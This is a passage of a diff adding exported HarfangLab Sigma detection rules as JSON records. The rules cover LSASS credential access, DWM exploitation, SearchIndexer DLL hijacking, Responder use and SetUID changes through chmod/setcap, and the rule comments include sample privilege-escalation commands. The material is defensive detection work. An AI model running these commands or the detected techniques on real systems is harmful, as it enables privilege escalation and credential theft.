'wd260std64.DLL'\n # WinDev 26 VM\n - 'wd260vm64.DLL'\n\n exclusion_easeus:\n ProcessImage:\n - '?:\\Program Files (x86)\\EaseUS\\Todo Backup\\bin\\TodoBackupService.exe'\n - '?:\\Program Files (x86)\\EaseUS\\ENS\\ensserver.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'CHENGDU YIWO Tech Development Co., Ltd.'\n\n exclusion_watchguard:\n ProcessImage: '?:\\Program Files (x86)\\WatchGuard\\WatchGuard Mobile VPN with SSL\\wgsslvpnsrc.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\WatchGuard\\WatchGuard Mobile VPN with SSL\\wgsslvpnsrc.exe'\n\n exclusion_writedescexecutefilename:\n # C:\\Windows\\Temp\\{368361DA-CBF9-4A07-90CB-2CFF91E36DCC}\\WriteDescExecuteFileName.exe\n ProcessImage: '*\\WriteDescExecuteFileName.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Samsung Electronics CO., LTD.'\n GrantedAccess: '0x153b'\n\n exclusion_xerox:\n ProcessImage: '?:\\Xerox\\Docushare\\IDOLServer\\IDOL\\AutonomyIDOLServer.exe'\n CallTrace|contains: '|?:\\Xerox\\Docushare\\IDOLServer\\IDOL\\AutonomyIDOLServer.exe+'\n GrantedAccess: '0x1410'\n\n exclusion_metricbeat:\n ProcessImage: '?:\\Program Files\\Metricbeat\\metricbeat.exe'\n ProcessCompany: ''\n ProcessDescription: ''\n ProcessProduct: ''\n CallTrace|contains: '|?:\\Program Files\\Metricbeat\\metricbeat.exe+?????'\n GrantedAccess: '0x1010'\n\n exclusion_zabbix:\n ProcessImage|endswith: '\\zabbix_agentd.exe'\n CallTrace|endswith:\n - '\\zabbix_agentd.exe+?????|?:\\Windows\\System32\\kernel32.dll+?????|?:\\Windows\\System32\\ntdll.dll+?????'\n - '\\zabbix_agentd.exe+?????|?:\\Windows\\System32\\kernel32.dll+????|?:\\Windows\\System32\\ntdll.dll+?????'\n - '\\zabbix_agentd.exe+?????'\n GrantedAccess: '0x1410'\n\n exclusion_oracle_rman:\n ProcessImage|endswith: '\\app\\product\\\\*\\dbhome\\bin\\rman.exe'\n\n exclusion_oracle_dll:\n GrantedAccess: '0x1410'\n # d:\\oracle\\product\\12.2.0\\client_1\\bin\\orannzsbb12.dll\n # E:\\oracle\\product\\12.2.0\\cl32\\bin\\orannzsbb12.dll+\n # E:\\Oracle_client19\\product\\19.0.0\\client_1\\bin\\orannzsbb19.dll\n CallTrace|contains:\n - '\\bin\\orannzsbb??.dll'\n - '\\bin\\oracrf??.dll'\n - '\\bin\\oracore??.dll'\n\n exclusion_xampp:\n # C:\\xampp\\xampp-control.exe\n # no PE metadata information so we must use the SHA256\n ProcessSha256: '1400812815452aa93ab1e051b11f8062ace7bc95e50a91cc3479ba64ed847dde'\n\n exclusion_manageengine:\n ProcessImage: '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\appctrl\\bin\\VerifyTrustedFiles.exe'\n\n exclusion_nagios:\n ProcessImage: '?:\\Program Files (x86)\\Nagios\\NCPA\\ncpa_passive.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\Nagios\\NCPA\\python27.dll+'\n\n exclusion_hewlett_packard:\n ProcessImage: '?:\\Program Files (x86)\\Hewlett-Packard\\Library and Tape Tools WebGUI\\bin\\DeviceAnalysisService.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\Hewlett-Packard\\Library and Tape Tools WebGUI\\bin\\DeviceAnalysisService.exe+'\n\n exclusion_streaming_runtime:\n ProcessImage: '?:\\Program Files\\Streaming Runtime Service\\pxr_srs_launcher.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\Hewlett-Packard\\Library and Tape Tools WebGUI\\bin\\DeviceAnalysisService.exe+'\n GrantedAccess: '0x1fffff'\n ProcessSigned: 'true'\n ProcessSignature: 'Qingdao Pico Technology Co.,Ltd.'\n\n exclusion_watchguard_2:\n ProcessImage: '?:\\WatchGuard\\wgsslvpnsrc.exe'\n CallTrace|contains: '|?:\\WatchGuard\\wgsslvpnsrc.exe+'\n GrantedAccess: '0x1f3fff'\n ProcessSigned: 'true'\n ProcessSignature: 'WatchGuard Technologies'\n\n exclusion_moneweb:\n ProcessImage|endswith: '\\Moneweb\\GoldenGatesrvmweb_??\\mgr.exe'\n CallTrace|contains: '\\Moneweb\\GoldenGatesrvmweb_??\\mgr.exe+'\n GrantedAccess: '0x1410'\n\n exclusion_equitrac:\n ProcessImage: '?:\\Program Files\\Equitrac\\Shared Services\\Caching\\bin\\sigar_port.exe'\n CallTrace|contains: '?:\\Program Files\\Equitrac\\Shared Services\\Caching\\bin\\sigar.dll'\n\n exclusion_mactype:\n ProcessImage: '?:\\program files\\mactype\\mt64agnt.exe'\n\n exclusion_svc_mgr_alcatel:\n ProcessImage: '?:\\8770\\bin\\svc_mgr.exe'\n\n exclusion_kill_ciril:\n ProcessImage|endswith:\n - '\\ciril\\prod\\util_unix\\kill.exe'\n - '\\ciril\\prod\\util_unix\\pskill.exe'\n - '\\ciril\\prod\\utilitaires\\expl\\kill_processus.exe'\n - '\\ciril\\net\\cgi-bin\\document.exe'\n - '\\ciril\\net\\cgi-bin\\irename.exe'\n - '\\ciril\\net\\cgi-bin\\lirepjfaccpp.exe'\n\n exclusion_hardis_saas:\n ProcessImage: '?:\\hardis\\saas-mgr\\saas-mgr.exe'\n ProcessGrandparentImage: '?:\\Windows\\system32\\services.exe'\n\n exclusion_appdynamics:\n ProcessImage: '?:\\ProgramData\\AppDynamics\\agents\\machineagent\\bin\\MachineAgentService.exe'\n ProcessGrandparentImage: '?:\\Windows\\system32\\services.exe'\n\n exclusion_rufus:\n ProcessProcessName: 'rufus-?.?.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Akeo Consulting'\n GrantedAccess: '0x1450'\n\n exclusion_nokia_vitalsuite:\n ProcessImage|endswith:\n - '\\VSCommon\\Program\\vnStatusKill.exe'\n - '\\VitalNet\\Program\\aggrun.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "053fc596-ebe0-4ab6-9d82-691fec399375",
+ "rule_name": "LSASS Accessed by Process Without PE Metadata Information",
+ "rule_description": "Detects the suspicious open of lsass.exe by a process without PE metadata information (original name and internal name).\nThis can be indicative of an attempt to dump LSASS' memory for privilege escalation purposes.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nIt is recommended to analyze the source process for malicious content, to check its legitimacy and origin and to start memory forensics to determine stolen credentials.\n",
+ "rule_creation_date": "2021-06-07",
+ "rule_modified_date": "2026-02-16",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.credential_access"
+ ],
+ "rule_technique_tags": [
+ "attack.t1003.001",
+ "attack.t1078"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0551aa79-1306-43bb-9b6d-df4f7837d107",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.596475Z",
+ "creation_date": "2026-03-23T11:45:34.596485Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.596500Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://x.com/dez_/status/1790807116363481415",
+ "https://securelist.com/cve-2024-30051/112618/",
+ "https://attack.mitre.org/techniques/T1068/"
+ ],
+ "name": "t1068_dwm_launch_process.yml",
+ "content": "title: Suspicious Child Process Launched by DWM.exe\nid: 0551aa79-1306-43bb-9b6d-df4f7837d107\ndescription: |\n Detects a suspicious process launched by dwm.exe.\n Adversaries have been observed exploiting vulnerabilities in DWM in order to escalate privileges. As result of a successful exploitation, the DWM.exe process launch a child process with System privileges.\n It is recommended to check actions made by the newly created process for suspicious activity.\nreferences:\n - https://x.com/dez_/status/1790807116363481415\n - https://securelist.com/cve-2024-30051/112618/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2024/07/23\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2024-30051\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Exploitation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\dwm.exe'\n\n filter_known_children:\n Image:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\System32\\ISM.exe'\n - '?:\\Windows\\System32\\dwm.exe'\n - '?:\\Windows\\System32\\dgcvideo.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0551aa79-1306-43bb-9b6d-df4f7837d107",
+ "rule_name": "Suspicious Child Process Launched by DWM.exe",
+ "rule_description": "Detects a suspicious process launched by dwm.exe.\nAdversaries have been observed exploiting vulnerabilities in DWM in order to escalate privileges. As result of a successful exploitation, the DWM.exe process launch a child process with System privileges.\nIt is recommended to check actions made by the newly created process for suspicious activity.\n",
+ "rule_creation_date": "2024-07-23",
+ "rule_modified_date": "2025-04-08",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1068"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "05797331-a902-41f3-8dd3-3e0f5cc17d73",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.595136Z",
+ "creation_date": "2026-03-23T11:45:34.595139Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.595147Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/",
+ "https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_searchindexer.yml",
+ "content": "title: DLL Hijacking via SearchIndexer.exe\nid: 05797331-a902-41f3-8dd3-3e0f5cc17d73\ndescription: |\n Detects potential Windows DLL Hijacking via SearchIndexer.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/\n - https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SearchIndexer.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\msftedit.dll'\n - '\\mstracer.dll'\n - '\\msfte.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "05797331-a902-41f3-8dd3-3e0f5cc17d73",
+ "rule_name": "DLL Hijacking via SearchIndexer.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via SearchIndexer.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2022-09-15",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "058378a0-6b19-4ce5-86a4-9bd8a453e8ad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.619415Z",
+ "creation_date": "2026-03-23T11:45:34.619416Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.619421Z",
+ "rule_level": "critical",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://github.com/SpiderLabs/Responder",
+ "https://github.com/lgandx/Responder",
+ "https://attack.mitre.org/software/S0174/"
+ ],
+ "name": "t1557_001_responder_usage.yml",
+ "content": "title: Responder Executed\nid: 058378a0-6b19-4ce5-86a4-9bd8a453e8ad\ndescription: |\n Detects Responder, an open source tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.\n Attackers can use this tool for credential access, privilege escalation and lateral movement.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://github.com/SpiderLabs/Responder\n - https://github.com/lgandx/Responder\n - https://attack.mitre.org/software/S0174/\ndate: 2024/09/26\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.collection\n - attack.t1557.001\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.HackTool.Responder\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine: 'sh -c */certs/gen-self-signed-cert.sh >/dev/null 2>&1'\n\n condition: selection\nlevel: critical\nconfidence: strong",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "058378a0-6b19-4ce5-86a4-9bd8a453e8ad",
+ "rule_name": "Responder Executed",
+ "rule_description": "Detects Responder, an open source tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.\nAttackers can use this tool for credential access, privilege escalation and lateral movement.\nIt is recommended to verify if the usage of this tool is legitimate.\n",
+ "rule_creation_date": "2024-09-26",
+ "rule_modified_date": "2025-02-05",
+ "rule_os": "linux",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.collection",
+ "attack.credential_access",
+ "attack.discovery"
+ ],
+ "rule_technique_tags": [
+ "attack.t1040",
+ "attack.t1557.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "058b2e5d-6e8a-4289-bfb7-96a9cc306c0f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "weak",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-24T07:14:08.594725Z",
+ "creation_date": "2026-03-23T11:45:34.623356Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.623360Z",
+ "rule_level": "high",
+ "rule_confidence": "weak",
+ "rule_confidence_override": null,
+ "references": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md",
+ "https://attack.mitre.org/techniques/T1548/001/"
+ ],
+ "name": "t1548_001_chmod_setuid_linux.yml",
+ "content": "title: SetUID Access Flag Set via chmod/setcap\nid: 058b2e5d-6e8a-4289-bfb7-96a9cc306c0f\ndescription: |\n Detects when chmod or setcap are used to set the SetUID bit or capability on a file.\n This could be used by an attacker to execute a file with a different (and potentially more privileged) user context.\n It is recommended to analyze the targeted binary as well as the process responsible for the setting change and look for privilege escalation and malicious binaries.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md\n - https://attack.mitre.org/techniques/T1548/001/\ndate: 2022/09/26\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.001\n - attack.t1222.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Chmod\n - classification.Linux.Behavior.ConfigChange\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_chmod:\n # chmod +s /home/user/malicious_script.sh\n # chmod ug+s /home/user/malicious_script.sh\n # chmod u+s /home/user/malicious_script.sh\n # chmod 2644 /home/user/malicious_script.sh\n # chmod 6644 /home/user/malicious_script.sh\n Image|endswith: '/chmod'\n CommandLine|contains:\n - ' +s'\n - 'ug+s'\n - 'u+s'\n - ' 4??? '\n - ' 6??? '\n ParentImage|contains: '?'\n\n selection_setcap:\n # setcap cap_setuid=pe /home/user/malicious_script.sh\n # setcap cap_setuid=e /home/user/malicious_script.sh\n # setcap cap_setuid=+pie /home/user/malicious_script.sh\n # setcap cap_net_bind_service,cap_setuid=pe /home/user/malicious_script.sh\n # setcap cap_setuid,cap_setgid=+pie /home/user/malicious_script.sh\n Image|endswith: '/setcap'\n CommandLine|contains: 'cap_setuid'\n ParentImage|contains: '?'\n\n exclusion_octal:\n CommandLine|startswith: 'chmod ??? /'\n\n exclusion_dpkg:\n - ParentImage: '/usr/bin/dpkg'\n - GrandparentImage: '/usr/bin/dpkg'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|'\n\n exclusion_suexec:\n CommandLine: 'chmod 4510 /usr/sbin/suexec'\n ParentCommandLine: '/bin/bash /usr/lib64/plesk-?.?/install_suexec'\n\n exclusion_virtualbox:\n CommandLine:\n - 'chmod 4511 /usr/lib/virtualbox/VBoxVolInfo'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxNetAdpCtl'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxNetNAT'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxNetDHCP'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxHeadless'\n - 'chmod 4511 /usr/lib/virtualbox/VirtualBoxVM'\n ParentCommandLine: '/bin/sh /var/lib/dpkg/info/virtualbox-*.postinst configure*'\n\n exclusion_yocto_sdk:\n # chmod o-x,u+s /opt/yocto/yocto-new/build/...\n # chmod 4755 /opt/yocto/kirkstone/build..\n # chmod 4111 /opt/yocto/yocto-new/build/tmp...\n CommandLine: 'chmod * /opt/yocto/*'\n\n exclusion_vtom:\n CommandLine:\n - 'chmod 4755 /opt/vtom/manager/bin/vtmanager'\n - 'chmod 4755 /opt/vtom/abm/bin/bdaemon'\n\n exclusion_isa:\n ParentCommandLine: '/bin/bash /etc/init.d/isa status'\n\n exclusion_bitdefender:\n # /bin/sh /var/lib/dpkg/info/bitdefender-security-tools.postinst configure 7.0.5-200090\n CommandLine: 'chmod +s /opt/bitdefender-security-tools/bin/auctl'\n ParentCommandLine|startswith: '/bin/sh /var/lib/dpkg/info/bitdefender-security-tools.postinst configure'\n\n exclusion_nxserver:\n CommandLine|contains:\n - ' /etc/nx/nxserver'\n - ' /usr/nx/scripts'\n ParentCommandLine|startswith:\n - '/bin/bash /usr/nx/scripts/setup/nxserver'\n - '/usr/bin/bash /usr/nx/scripts/setup/nxserver'\n - '/bin/bash /usr/nx/scripts/setup/nxnode'\n - '/usr/bin/bash /usr/nx/scripts/setup/nxnode'\n - '/bin/bash /usr/nx/scripts/setup/nxrunner'\n - '/usr/bin/bash /usr/nx/scripts/setup/nxrunner'\n\n exclusion_apt:\n GrandparentImage:\n - '/usr/bin/apt-get'\n - '/usr/bin/apt'\n\n exclusion_dnf:\n - GrandparentImage: '/usr/bin/dnf5'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_rpm:\n ProcessAncestors|contains: '|/usr/bin/rpm|'\n\n exclusion_netdata:\n - GrandparentCommandLine: '/bin/sh /etc/cron.daily/netdata-updater'\n - CommandLine|startswith: 'chmod 4750 usr/libexec/netdata/plugins.d/'\n ParentCommandLine|startswith: './bin/bash system/install-or-update.sh '\n\n exclusion_yum:\n GrandparentCommandLine|startswith: '/usr/bin/python /bin/yum '\n\n exclusion_make:\n - ParentImage: '/usr/bin/make'\n - GrandparentImage: '/usr/bin/make'\n\n exclusion_sap:\n CommandLine: 'chmod * /usr/sap/*/exe/*'\n ParentCommandLine|startswith:\n - '/bin/sh ./oraroot.sh '\n - '/bin/sh ./saproot.sh '\n\n exclusion_oracle:\n CommandLine|contains:\n - 'chmod * /u01/app/oracle/'\n - 'chmod ???? /oracle/'\n - 'chmod ???? /exec/oracle/product/'\n - 'chmod ???? /usr/lib/oracle/agent/'\n - 'chmod ???? /opt/ORCLfmap/'\n - 'chmod ???? /opt/oracle/'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_cloudera:\n ParentCommandLine|startswith:\n - '/usr/bin/python?.? /opt/cloudera'\n - '/usr/bin/python?.?? /opt/cloudera'\n\n exclusion_oneautomation:\n ProcessCommandLine: 'chmod 4755 /opt/oneautomation/*/agent/bin/ucxj*'\n\n exclusion_docker:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/runc|/usr/bin/dockerd|'\n - '|/usr/sbin/runc|/usr/bin/dockerd|'\n - '|/usr/bin/podman|'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/opt/copiloteagent/copiloteagent|'\n - '|/usr/NX/bin/nxpost|'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: weak\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "058b2e5d-6e8a-4289-bfb7-96a9cc306c0f",
+ "rule_name": "SetUID Access Flag Set via chmod/setcap",
+ "rule_description": "Detects when chmod or setcap are used to set the SetUID bit or capability on a file.\nThis could be used by an attacker to execute a file with a different (and potentially more privileged) user context.\nIt is recommended to analyze the targeted binary as well as the process responsible for the setting change and look for privilege escalation and malicious binaries.\n",
+ "rule_creation_date": "2022-09-26",
+ "rule_modified_date": "2026-03-23",
+ "rule_os": "linux",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1222.002",
+ "attack.t1548.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "059bfeb6-d7ab-49e8-995d-d3c4bca73b53",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.592167Z",
+ "creation_date": "2026-03-23T11:45:34.592171Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.592179Z",
+ "rule_level": "high",
